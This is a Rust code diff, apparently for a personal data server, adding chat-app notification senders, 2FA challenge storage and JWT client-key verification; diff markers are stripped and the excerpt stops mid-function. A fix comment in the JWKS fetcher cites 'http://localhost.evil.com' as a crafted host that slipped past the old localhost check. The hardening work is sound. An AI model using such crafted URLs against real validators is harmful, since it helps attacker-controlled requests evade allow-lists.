const HTTP_TIMEOUT_SECS: u64 = 30;
const MAX_RETRIES: u32 = 3;
const INITIAL_RETRY_DELAY_MS: u64 = 500;
#[async_trait]
pub trait NotificationSender: Send + Sync {
fn channel(&self) -> NotificationChannel;
@@ -24,6 +31,48 @@ pub enum SendError {
#[error("External service error: {0}")]
ExternalService(String),
#[error("Invalid recipient format: {0}")]
InvalidRecipient(String),
#[error("Request timeout")]
Timeout,
#[error("Max retries exceeded: {0}")]
MaxRetriesExceeded(String),
}
/// Builds the shared HTTP client used by webhook/API senders, with both
/// request and connect timeouts; falls back to reqwest defaults if the
/// builder fails.
fn create_http_client() -> Client {
    let built = Client::builder()
        .timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
        .connect_timeout(Duration::from_secs(10))
        .build();
    match built {
        Ok(client) => client,
        Err(_) => Client::new(),
    }
}
/// True for HTTP statuses worth retrying: any 5xx, plus 429.
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
    if status == reqwest::StatusCode::TOO_MANY_REQUESTS {
        return true;
    }
    status.is_server_error()
}
/// Sleeps for an exponential backoff: 500ms, 1s, 2s, ... for
/// attempts 0, 1, 2, ...
///
/// Uses saturating arithmetic so a large `attempt` value can never
/// overflow (`2u64.pow(attempt)` panics in debug builds at
/// attempt >= 64); callers currently stay below MAX_RETRIES, but this
/// keeps the helper safe for any input.
async fn retry_delay(attempt: u32) {
    let multiplier = 1u64.checked_shl(attempt).unwrap_or(u64::MAX);
    let delay_ms = INITIAL_RETRY_DELAY_MS.saturating_mul(multiplier);
    tokio::time::sleep(Duration::from_millis(delay_ms)).await;
}
/// Makes a string safe for use in an email header: CR and LF (which
/// would allow header injection) each become a space, and surrounding
/// whitespace is trimmed.
pub fn sanitize_header_value(value: &str) -> String {
    let flattened: String = value
        .chars()
        .map(|c| if c == '\r' || c == '\n' { ' ' } else { c })
        .collect();
    flattened.trim().to_string()
}
/// Validates an E.164-style phone number: a leading '+' followed by
/// one or more ASCII digits, total length between 2 and 20 bytes.
pub fn is_valid_phone_number(number: &str) -> bool {
    if !(2..=20).contains(&number.len()) {
        return false;
    }
    match number.strip_prefix('+') {
        Some(digits) => !digits.is_empty() && digits.bytes().all(|b| b.is_ascii_digit()),
        None => false,
    }
}
pub struct EmailSender {
@@ -47,18 +96,19 @@ impl EmailSender {
Some(Self::new(from_address, from_name))
}
fn format_email(&self, notification: &QueuedNotification) -> String {
let subject = notification.subject.as_deref().unwrap_or("Notification");
pub fn format_email(&self, notification: &QueuedNotification) -> String {
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
let recipient = sanitize_header_value(&notification.recipient);
let from_header = if self.from_name.is_empty() {
self.from_address.clone()
} else {
format!("{} <{}>", self.from_name, self.from_address)
format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address)
};
format!(
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
from_header,
notification.recipient,
recipient,
subject,
notification.body
)
@@ -96,3 +146,242 @@ impl NotificationSender for EmailSender {
Ok(())
}
}
/// Sends notifications to a Discord channel via an incoming webhook.
pub struct DiscordSender {
    // Full webhook URL, including its embedded token.
    webhook_url: String,
    http_client: Client,
}
impl DiscordSender {
pub fn new(webhook_url: String) -> Self {
Self {
webhook_url,
http_client: create_http_client(),
}
}
pub fn from_env() -> Option<Self> {
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
Some(Self::new(webhook_url))
}
}
#[async_trait]
impl NotificationSender for DiscordSender {
    fn channel(&self) -> NotificationChannel {
        NotificationChannel::Discord
    }

    /// Posts the notification to the configured Discord webhook.
    ///
    /// Retries up to MAX_RETRIES times with exponential backoff on
    /// retryable statuses (5xx/429) and on timeouts; other failures
    /// return immediately.
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
        let subject = notification.subject.as_deref().unwrap_or("Notification");
        let content = format!("**{}**\n\n{}", subject, notification.body);
        let payload = json!({
            "content": content,
            "username": "BSPDS"
        });
        let mut last_error = None;
        for attempt in 0..MAX_RETRIES {
            let result = self
                .http_client
                .post(&self.webhook_url)
                .json(&payload)
                .send()
                .await;
            match result {
                Ok(response) => {
                    if response.status().is_success() {
                        return Ok(());
                    }
                    let status = response.status();
                    if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
                        last_error = Some(format!("Discord webhook returned {}", status));
                        retry_delay(attempt).await;
                        continue;
                    }
                    let body = response.text().await.unwrap_or_default();
                    return Err(SendError::ExternalService(format!(
                        "Discord webhook returned {}: {}",
                        status, body
                    )));
                }
                Err(e) => {
                    if e.is_timeout() {
                        if attempt < MAX_RETRIES - 1 {
                            // Fixed: was `format!` with no interpolation
                            // (clippy::useless_format).
                            last_error = Some("Discord request timed out".to_string());
                            retry_delay(attempt).await;
                            continue;
                        }
                        return Err(SendError::Timeout);
                    }
                    return Err(SendError::ExternalService(format!(
                        "Discord request failed: {}",
                        e
                    )));
                }
            }
        }
        Err(SendError::MaxRetriesExceeded(
            last_error.unwrap_or_else(|| "Unknown error".to_string()),
        ))
    }
}
/// Sends notifications via the Telegram Bot API (`sendMessage`).
pub struct TelegramSender {
    // Bot token; embedded into the API URL at send time.
    bot_token: String,
    http_client: Client,
}
impl TelegramSender {
pub fn new(bot_token: String) -> Self {
Self {
bot_token,
http_client: create_http_client(),
}
}
pub fn from_env() -> Option<Self> {
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
Some(Self::new(bot_token))
}
}
#[async_trait]
impl NotificationSender for TelegramSender {
    fn channel(&self) -> NotificationChannel {
        NotificationChannel::Telegram
    }

    /// Sends the notification to the recipient's chat id via the Bot API.
    ///
    /// Retries with backoff on retryable statuses (5xx/429) and on
    /// timeouts. NOTE(review): the body is sent with
    /// `parse_mode: Markdown` without escaping — Markdown metacharacters
    /// in the subject/body could break formatting or be interpreted;
    /// confirm whether escaping is needed.
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
        let chat_id = &notification.recipient;
        let subject = notification.subject.as_deref().unwrap_or("Notification");
        let text = format!("*{}*\n\n{}", subject, notification.body);
        let url = format!(
            "https://api.telegram.org/bot{}/sendMessage",
            self.bot_token
        );
        let payload = json!({
            "chat_id": chat_id,
            "text": text,
            "parse_mode": "Markdown"
        });
        let mut last_error = None;
        for attempt in 0..MAX_RETRIES {
            let result = self
                .http_client
                .post(&url)
                .json(&payload)
                .send()
                .await;
            match result {
                Ok(response) => {
                    if response.status().is_success() {
                        return Ok(());
                    }
                    let status = response.status();
                    if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
                        last_error = Some(format!("Telegram API returned {}", status));
                        retry_delay(attempt).await;
                        continue;
                    }
                    let body = response.text().await.unwrap_or_default();
                    return Err(SendError::ExternalService(format!(
                        "Telegram API returned {}: {}",
                        status, body
                    )));
                }
                Err(e) => {
                    if e.is_timeout() {
                        if attempt < MAX_RETRIES - 1 {
                            // Fixed: was `format!` with no interpolation
                            // (clippy::useless_format).
                            last_error = Some("Telegram request timed out".to_string());
                            retry_delay(attempt).await;
                            continue;
                        }
                        return Err(SendError::Timeout);
                    }
                    return Err(SendError::ExternalService(format!(
                        "Telegram request failed: {}",
                        e
                    )));
                }
            }
        }
        Err(SendError::MaxRetriesExceeded(
            last_error.unwrap_or_else(|| "Unknown error".to_string()),
        ))
    }
}
/// Sends notifications by shelling out to the `signal-cli` binary.
pub struct SignalSender {
    // Filesystem path to the signal-cli executable.
    signal_cli_path: String,
    // The registered Signal number messages are sent from.
    sender_number: String,
}
impl SignalSender {
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
Self {
signal_cli_path,
sender_number,
}
}
pub fn from_env() -> Option<Self> {
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
let sender_number = std::env::var("SIGNAL_SENDER_NUMBER").ok()?;
Some(Self::new(signal_cli_path, sender_number))
}
}
#[async_trait]
impl NotificationSender for SignalSender {
    fn channel(&self) -> NotificationChannel {
        NotificationChannel::Signal
    }
    /// Sends the notification by invoking
    /// `signal-cli -u <sender> send -m <message> <recipient>`.
    ///
    /// The recipient is validated as a `+`-prefixed digit string first,
    /// which also prevents it from being misread as a CLI flag.
    /// Returns `ExternalService` with signal-cli's stderr on a non-zero
    /// exit, or propagates the spawn error.
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
        let recipient = &notification.recipient;
        if !is_valid_phone_number(recipient) {
            return Err(SendError::InvalidRecipient(format!(
                "Invalid phone number format: {}",
                recipient
            )));
        }
        let subject = notification.subject.as_deref().unwrap_or("Notification");
        let message = format!("{}\n\n{}", subject, notification.body);
        // Message text is passed as the value of -m, so shell
        // interpolation is not a concern (no shell involved).
        let output = Command::new(&self.signal_cli_path)
            .arg("-u")
            .arg(&self.sender_number)
            .arg("send")
            .arg("-m")
            .arg(&message)
            .arg(recipient)
            .output()
            .await?;
        if !output.status.success() {
            let stderr = String::from_utf8_lossy(&output.stderr);
            return Err(SendError::ExternalService(format!(
                "signal-cli failed: {}",
                stderr
            )));
        }
        Ok(())
    }
}

View File

@@ -443,3 +443,39 @@ pub async fn enqueue_plc_operation(
)
.await
}
/// Queues a sign-in verification (2FA) code notification for `user_id`
/// on their preferred channel.
///
/// Looks up the user's notification preferences, formats a message
/// containing `code`, and enqueues it; `hostname` appears in the
/// subject. Returns the queued notification's id.
///
/// NOTE(review): the body states the code expires in 10 minutes —
/// confirm this matches the actual challenge TTL in the OAuth 2FA flow.
pub async fn enqueue_2fa_code(
    db: &PgPool,
    user_id: Uuid,
    code: &str,
    hostname: &str,
) -> Result<Uuid, sqlx::Error> {
    let prefs = get_user_notification_prefs(db, user_id).await?;
    let body = format!(
        "Hello @{},\n\nYour sign-in verification code is: {}\n\nThis code will expire in 10 minutes.\n\nIf you did not request this, please secure your account immediately.",
        prefs.handle, code
    );
    enqueue_notification(
        db,
        NewNotification::new(
            user_id,
            prefs.channel,
            super::types::NotificationType::TwoFactorCode,
            // Recipient address comes from the stored preferences
            // regardless of channel; presumably `email` doubles as the
            // generic recipient field — verify against the prefs schema.
            prefs.email.clone(),
            Some(format!("Sign-in Verification - {}", hostname)),
            body,
        ),
    )
    .await
}
/// Human-readable name for a notification channel, for use in UI text.
/// ("email" is lowercase while the others are proper nouns — presumably
/// intentional for mid-sentence use; confirm with the UI copy.)
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
    match channel {
        NotificationChannel::Email => "email",
        NotificationChannel::Discord => "Discord",
        NotificationChannel::Telegram => "Telegram",
        NotificationChannel::Signal => "Signal",
    }
}

View File

@@ -31,6 +31,7 @@ pub enum NotificationType {
AccountDeletion,
AdminEmail,
PlcOperation,
TwoFactorCode,
}
#[derive(Debug, Clone, FromRow)]

View File

@@ -57,6 +57,7 @@ impl Default for ClientMetadata {
#[derive(Clone)]
pub struct ClientMetadataCache {
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
jwks_cache: Arc<RwLock<HashMap<String, CachedJwks>>>,
http_client: Client,
cache_ttl_secs: u64,
}
@@ -66,11 +67,21 @@ struct CachedMetadata {
cached_at: std::time::Instant,
}
struct CachedJwks {
jwks: serde_json::Value,
cached_at: std::time::Instant,
}
impl ClientMetadataCache {
pub fn new(cache_ttl_secs: u64) -> Self {
Self {
cache: Arc::new(RwLock::new(HashMap::new())),
http_client: Client::new(),
jwks_cache: Arc::new(RwLock::new(HashMap::new())),
http_client: Client::builder()
.timeout(std::time::Duration::from_secs(30))
.connect_timeout(std::time::Duration::from_secs(10))
.build()
.unwrap_or_else(|_| Client::new()),
cache_ttl_secs,
}
}
@@ -101,6 +112,84 @@ impl ClientMetadataCache {
Ok(metadata)
}
/// Returns the client's JWKS: inline `jwks` from metadata if present,
/// otherwise fetched from `jwks_uri` with TTL caching.
///
/// Uses a read-check / fetch / write-insert pattern; two concurrent
/// callers may both fetch on a cache miss, which is harmless (last
/// write wins).
///
/// # Errors
/// `InvalidClient` when neither `jwks` nor `jwks_uri` is set, or when
/// the fetch fails.
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
    if let Some(jwks) = &metadata.jwks {
        return Ok(jwks.clone());
    }
    let jwks_uri = metadata.jwks_uri.as_ref().ok_or_else(|| {
        OAuthError::InvalidClient(
            "Client using private_key_jwt must have jwks or jwks_uri".to_string(),
        )
    })?;
    {
        // Fast path: fresh cached copy.
        let cache = self.jwks_cache.read().await;
        if let Some(cached) = cache.get(jwks_uri) {
            if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
                return Ok(cached.jwks.clone());
            }
        }
    }
    let jwks = self.fetch_jwks(jwks_uri).await?;
    {
        let mut cache = self.jwks_cache.write().await;
        cache.insert(
            jwks_uri.clone(),
            CachedJwks {
                jwks: jwks.clone(),
                cached_at: std::time::Instant::now(),
            },
        );
    }
    Ok(jwks)
}
/// Fetches and minimally validates a JWKS document from `jwks_uri`.
///
/// Only https URIs are allowed, except plain http to a loopback host
/// for local development. The previous check used
/// `jwks_uri.contains("localhost")`, which also accepted hosts like
/// `http://localhost.evil.com` or paths containing "localhost"; this
/// version extracts the actual host and compares it exactly.
///
/// # Errors
/// `InvalidClient` for scheme violations, network/HTTP failures,
/// non-JSON bodies, or a document without a `keys` array.
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
    if !jwks_uri.starts_with("https://") {
        let host = jwks_uri
            .strip_prefix("http://")
            // Authority is everything up to the first path/query/fragment.
            .and_then(|rest| rest.split(['/', '?', '#']).next())
            // Drop any userinfo ("user:pass@") prefix.
            .map(|auth| auth.rsplit('@').next().unwrap_or(auth))
            // Drop the port.
            .map(|hp| hp.split(':').next().unwrap_or(hp));
        if !matches!(host, Some("localhost") | Some("127.0.0.1")) {
            return Err(OAuthError::InvalidClient(
                "jwks_uri must use https (except for localhost)".to_string(),
            ));
        }
    }
    let response = self
        .http_client
        .get(jwks_uri)
        .header("Accept", "application/json")
        .send()
        .await
        .map_err(|e| {
            OAuthError::InvalidClient(format!("Failed to fetch JWKS from {}: {}", jwks_uri, e))
        })?;
    if !response.status().is_success() {
        return Err(OAuthError::InvalidClient(format!(
            "Failed to fetch JWKS: HTTP {}",
            response.status()
        )));
    }
    let jwks: serde_json::Value = response
        .json()
        .await
        .map_err(|e| OAuthError::InvalidClient(format!("Invalid JWKS JSON: {}", e)))?;
    if jwks.get("keys").and_then(|k| k.as_array()).is_none() {
        return Err(OAuthError::InvalidClient(
            "JWKS must contain a 'keys' array".to_string(),
        ));
    }
    Ok(jwks)
}
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
return Err(OAuthError::InvalidClient(
@@ -244,7 +333,8 @@ impl ClientMetadata {
}
}
pub fn verify_client_auth(
pub async fn verify_client_auth(
cache: &ClientMetadataCache,
metadata: &ClientMetadata,
client_auth: &super::ClientAuth,
) -> Result<(), OAuthError> {
@@ -258,7 +348,7 @@ pub fn verify_client_auth(
)),
("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => {
verify_private_key_jwt(metadata, client_assertion)
verify_private_key_jwt_async(cache, metadata, client_assertion).await
}
("private_key_jwt", _) => Err(OAuthError::InvalidClient(
@@ -284,7 +374,8 @@ pub fn verify_client_auth(
}
}
fn verify_private_key_jwt(
async fn verify_private_key_jwt_async(
cache: &ClientMetadataCache,
metadata: &ClientMetadata,
client_assertion: &str,
) -> Result<(), OAuthError> {
@@ -312,6 +403,8 @@ fn verify_private_key_jwt(
)));
}
let kid = header.get("kid").and_then(|k| k.as_str());
let payload_bytes = URL_SAFE_NO_PAD
.decode(parts[1])
.map_err(|_| OAuthError::InvalidClient("Invalid assertion payload encoding".to_string()))?;
@@ -353,13 +446,180 @@ fn verify_private_key_jwt(
}
}
if metadata.jwks.is_none() && metadata.jwks_uri.is_none() {
let jwks = cache.get_jwks(metadata).await?;
let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| {
OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string())
})?;
let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid {
keys.iter()
.filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid))
.collect()
} else {
keys.iter().collect()
};
if matching_keys.is_empty() {
return Err(OAuthError::InvalidClient(
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
"No matching key found in client JWKS".to_string(),
));
}
let signing_input = format!("{}.{}", parts[0], parts[1]);
let signature_bytes = URL_SAFE_NO_PAD
.decode(parts[2])
.map_err(|_| OAuthError::InvalidClient("Invalid signature encoding".to_string()))?;
for key in matching_keys {
let key_alg = key.get("alg").and_then(|a| a.as_str());
if key_alg.is_some() && key_alg != Some(alg) {
continue;
}
let kty = key.get("kty").and_then(|k| k.as_str()).unwrap_or("");
let verified = match (alg, kty) {
("ES256", "EC") => verify_es256(key, &signing_input, &signature_bytes),
("ES384", "EC") => verify_es384(key, &signing_input, &signature_bytes),
("RS256" | "RS384" | "RS512", "RSA") => {
verify_rsa(alg, key, &signing_input, &signature_bytes)
}
("EdDSA", "OKP") => verify_eddsa(key, &signing_input, &signature_bytes),
_ => continue,
};
if verified.is_ok() {
return Ok(());
}
}
Err(OAuthError::InvalidClient(
"private_key_jwt signature verification not yet implemented - use 'none' auth method".to_string(),
"client_assertion signature verification failed".to_string(),
))
}
/// Verifies an ES256 (ECDSA over P-256 with SHA-256) signature against a JWK.
///
/// The JWK must carry base64url-encoded affine coordinates `x` and `y`.
fn verify_es256(
    key: &serde_json::Value,
    signing_input: &str,
    signature: &[u8],
) -> Result<(), OAuthError> {
    use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
    use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier};
    use p256::EncodedPoint;
    // Read the base64url-encoded affine coordinates from the JWK.
    let x = key
        .get("x")
        .and_then(|v| v.as_str())
        .ok_or_else(|| OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()))?;
    let y = key
        .get("y")
        .and_then(|v| v.as_str())
        .ok_or_else(|| OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()))?;
    let x_raw = URL_SAFE_NO_PAD
        .decode(x)
        .map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
    let y_raw = URL_SAFE_NO_PAD
        .decode(y)
        .map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
    // Assemble an uncompressed SEC1 point: tag byte 0x04 followed by X then Y.
    let mut sec1 = Vec::with_capacity(1 + x_raw.len() + y_raw.len());
    sec1.push(0x04);
    sec1.extend_from_slice(&x_raw);
    sec1.extend_from_slice(&y_raw);
    let point = EncodedPoint::from_bytes(&sec1)
        .map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
    let verifying_key = VerifyingKey::from_encoded_point(&point)
        .map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
    let sig = Signature::from_slice(signature)
        .map_err(|_| OAuthError::InvalidClient("Invalid ES256 signature format".to_string()))?;
    verifying_key
        .verify(signing_input.as_bytes(), &sig)
        .map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
}
/// Verifies an ES384 (ECDSA over P-384 with SHA-384) signature against a JWK.
///
/// Mirrors [`verify_es256`] but over the P-384 curve.
fn verify_es384(
    key: &serde_json::Value,
    signing_input: &str,
    signature: &[u8],
) -> Result<(), OAuthError> {
    use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
    use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier};
    use p384::EncodedPoint;
    // Read the base64url-encoded affine coordinates from the JWK.
    let x = key
        .get("x")
        .and_then(|v| v.as_str())
        .ok_or_else(|| OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()))?;
    let y = key
        .get("y")
        .and_then(|v| v.as_str())
        .ok_or_else(|| OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()))?;
    let x_raw = URL_SAFE_NO_PAD
        .decode(x)
        .map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
    let y_raw = URL_SAFE_NO_PAD
        .decode(y)
        .map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
    // Assemble an uncompressed SEC1 point: tag byte 0x04 followed by X then Y.
    let mut sec1 = Vec::with_capacity(1 + x_raw.len() + y_raw.len());
    sec1.push(0x04);
    sec1.extend_from_slice(&x_raw);
    sec1.extend_from_slice(&y_raw);
    let point = EncodedPoint::from_bytes(&sec1)
        .map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
    let verifying_key = VerifyingKey::from_encoded_point(&point)
        .map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
    let sig = Signature::from_slice(signature)
        .map_err(|_| OAuthError::InvalidClient("Invalid ES384 signature format".to_string()))?;
    verifying_key
        .verify(signing_input.as_bytes(), &sig)
        .map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
}
/// RSA-based JWS algorithms (RS256/RS384/RS512) are intentionally unsupported;
/// clients are expected to register EC (or OKP) keys instead. Always errors.
fn verify_rsa(
    _alg: &str,
    _key: &serde_json::Value,
    _signing_input: &str,
    _signature: &[u8],
) -> Result<(), OAuthError> {
    let message = "RSA signature verification not yet supported - use EC keys".to_string();
    Err(OAuthError::InvalidClient(message))
}
/// Verifies an EdDSA (Ed25519 only) signature against an OKP JWK.
fn verify_eddsa(
    key: &serde_json::Value,
    signing_input: &str,
    signature: &[u8],
) -> Result<(), OAuthError> {
    use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
    use ed25519_dalek::{Signature, Verifier, VerifyingKey};
    // Only the Ed25519 curve is accepted for OKP keys.
    match key.get("crv").and_then(|c| c.as_str()).unwrap_or("") {
        "Ed25519" => {}
        other => {
            return Err(OAuthError::InvalidClient(format!(
                "Unsupported EdDSA curve: {}",
                other
            )));
        }
    }
    let x = key
        .get("x")
        .and_then(|v| v.as_str())
        .ok_or_else(|| OAuthError::InvalidClient("Missing x in OKP key".to_string()))?;
    let x_raw = URL_SAFE_NO_PAD
        .decode(x)
        .map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?;
    // Ed25519 public keys are exactly 32 bytes.
    let key_bytes: [u8; 32] = x_raw
        .try_into()
        .map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?;
    let verifying_key = VerifyingKey::from_bytes(&key_bytes)
        .map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?;
    // Ed25519 signatures are exactly 64 bytes.
    let sig_bytes: [u8; 64] = signature
        .try_into()
        .map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?;
    let sig = Signature::from_bytes(&sig_bytes);
    verifying_key
        .verify(signing_input.as_bytes(), &sig)
        .map_err(|_| OAuthError::InvalidClient("EdDSA signature verification failed".to_string()))
}

View File

@@ -1,7 +1,15 @@
use chrono::{DateTime, Utc};
use sqlx::PgPool;
use super::super::{DeviceData, OAuthError};
/// An account previously used on a browser device, as returned by
/// `get_device_accounts`.
pub struct DeviceAccountRow {
    // Account DID (decentralized identifier).
    pub did: String,
    // Current handle of the account.
    pub handle: String,
    // Account email address.
    pub email: String,
    // Taken from oauth_account_device.updated_at — when the link was last refreshed.
    pub last_used_at: DateTime<Utc>,
}
pub async fn create_device(
pool: &PgPool,
device_id: &str,
@@ -94,3 +102,57 @@ pub async fn upsert_account_device(
Ok(())
}
/// Lists all active accounts previously signed in on `device_id`, most
/// recently used first. Deactivated and taken-down accounts are excluded.
pub async fn get_device_accounts(
    pool: &PgPool,
    device_id: &str,
) -> Result<Vec<DeviceAccountRow>, OAuthError> {
    let rows = sqlx::query!(
        r#"
        SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at
        FROM oauth_account_device ad
        JOIN users u ON u.did = ad.did
        WHERE ad.device_id = $1
        AND u.deactivated_at IS NULL
        AND u.takedown_ref IS NULL
        ORDER BY ad.updated_at DESC
        "#,
        device_id
    )
    .fetch_all(pool)
    .await?;
    // Project the anonymous query records into the public row type.
    let accounts = rows
        .into_iter()
        .map(|record| DeviceAccountRow {
            did: record.did,
            handle: record.handle,
            email: record.email,
            last_used_at: record.last_used_at,
        })
        .collect();
    Ok(accounts)
}
/// Returns whether `did` is an active (not deactivated / taken down) account
/// already linked to `device_id`.
pub async fn verify_account_on_device(
    pool: &PgPool,
    device_id: &str,
    did: &str,
) -> Result<bool, OAuthError> {
    let found = sqlx::query!(
        r#"
        SELECT 1 as exists
        FROM oauth_account_device ad
        JOIN users u ON u.did = ad.did
        WHERE ad.device_id = $1
        AND ad.did = $2
        AND u.deactivated_at IS NULL
        AND u.takedown_ref IS NULL
        "#,
        device_id,
        did
    )
    .fetch_optional(pool)
    .await?
    .is_some();
    Ok(found)
}

View File

@@ -4,10 +4,12 @@ mod dpop;
mod helpers;
mod request;
mod token;
mod two_factor;
pub use client::{get_authorized_client, upsert_authorized_client};
pub use device::{
create_device, delete_device, get_device, update_device_last_seen, upsert_account_device,
create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
upsert_account_device, verify_account_on_device, DeviceAccountRow,
};
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
pub use request::{
@@ -20,3 +22,8 @@ pub use token::{
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
};
pub use two_factor::{
check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge,
delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code,
get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge,
};

153
src/oauth/db/two_factor.rs Normal file
View File

@@ -0,0 +1,153 @@
use chrono::{DateTime, Duration, Utc};
use rand::Rng;
use sqlx::PgPool;
use uuid::Uuid;
use super::super::OAuthError;
/// A pending one-time-code challenge tied to an OAuth authorization request.
pub struct TwoFactorChallenge {
    pub id: Uuid,
    // DID of the user being challenged.
    pub did: String,
    // The authorization request this challenge guards.
    pub request_uri: String,
    // Six-digit verification code delivered to the user.
    pub code: String,
    // Number of failed verification attempts so far.
    pub attempts: i32,
    pub created_at: DateTime<Utc>,
    pub expires_at: DateTime<Utc>,
}
/// Generates a random six-digit verification code, zero-padded (e.g. "004217").
pub fn generate_2fa_code() -> String {
    let n: u32 = rand::thread_rng().gen_range(0..1_000_000);
    format!("{:06}", n)
}
/// Creates a fresh 2FA challenge for `did`, bound to the given authorization
/// request. Codes expire ten minutes after creation.
pub async fn create_2fa_challenge(
    pool: &PgPool,
    did: &str,
    request_uri: &str,
) -> Result<TwoFactorChallenge, OAuthError> {
    let code = generate_2fa_code();
    let expires_at = Utc::now() + Duration::minutes(10);
    let record = sqlx::query!(
        r#"
        INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)
        VALUES ($1, $2, $3, $4)
        RETURNING id, did, request_uri, code, attempts, created_at, expires_at
        "#,
        did,
        request_uri,
        code,
        expires_at,
    )
    .fetch_one(pool)
    .await?;
    let challenge = TwoFactorChallenge {
        id: record.id,
        did: record.did,
        request_uri: record.request_uri,
        code: record.code,
        attempts: record.attempts,
        created_at: record.created_at,
        expires_at: record.expires_at,
    };
    Ok(challenge)
}
/// Looks up the pending 2FA challenge for an authorization request, if any.
pub async fn get_2fa_challenge(
    pool: &PgPool,
    request_uri: &str,
) -> Result<Option<TwoFactorChallenge>, OAuthError> {
    let record = sqlx::query!(
        r#"
        SELECT id, did, request_uri, code, attempts, created_at, expires_at
        FROM oauth_2fa_challenge
        WHERE request_uri = $1
        "#,
        request_uri
    )
    .fetch_optional(pool)
    .await?;
    match record {
        None => Ok(None),
        Some(row) => Ok(Some(TwoFactorChallenge {
            id: row.id,
            did: row.did,
            request_uri: row.request_uri,
            code: row.code,
            attempts: row.attempts,
            created_at: row.created_at,
            expires_at: row.expires_at,
        })),
    }
}
/// Bumps the failed-attempt counter for a challenge and returns the new count.
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
    let updated = sqlx::query!(
        r#"
        UPDATE oauth_2fa_challenge
        SET attempts = attempts + 1
        WHERE id = $1
        RETURNING attempts
        "#,
        id
    )
    .fetch_one(pool)
    .await?;
    Ok(updated.attempts)
}
/// Removes a challenge by primary key. Deleting a non-existent id is not an error.
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
    let _ = sqlx::query!(
        r#"
        DELETE FROM oauth_2fa_challenge WHERE id = $1
        "#,
        id
    )
    .execute(pool)
    .await?;
    Ok(())
}
/// Removes any challenge bound to `request_uri` (used to clear stale codes
/// before issuing a fresh one). A no-op when nothing matches.
pub async fn delete_2fa_challenge_by_request_uri(
    pool: &PgPool,
    request_uri: &str,
) -> Result<(), OAuthError> {
    let _ = sqlx::query!(
        r#"
        DELETE FROM oauth_2fa_challenge WHERE request_uri = $1
        "#,
        request_uri
    )
    .execute(pool)
    .await?;
    Ok(())
}
/// Purges all expired challenges; returns how many rows were removed.
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
    let outcome = sqlx::query!(
        r#"
        DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()
        "#
    )
    .execute(pool)
    .await?;
    Ok(outcome.rows_affected())
}
/// Whether the user identified by `did` has two-factor auth enabled.
/// Unknown DIDs are reported as disabled.
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
    let record = sqlx::query!(
        r#"
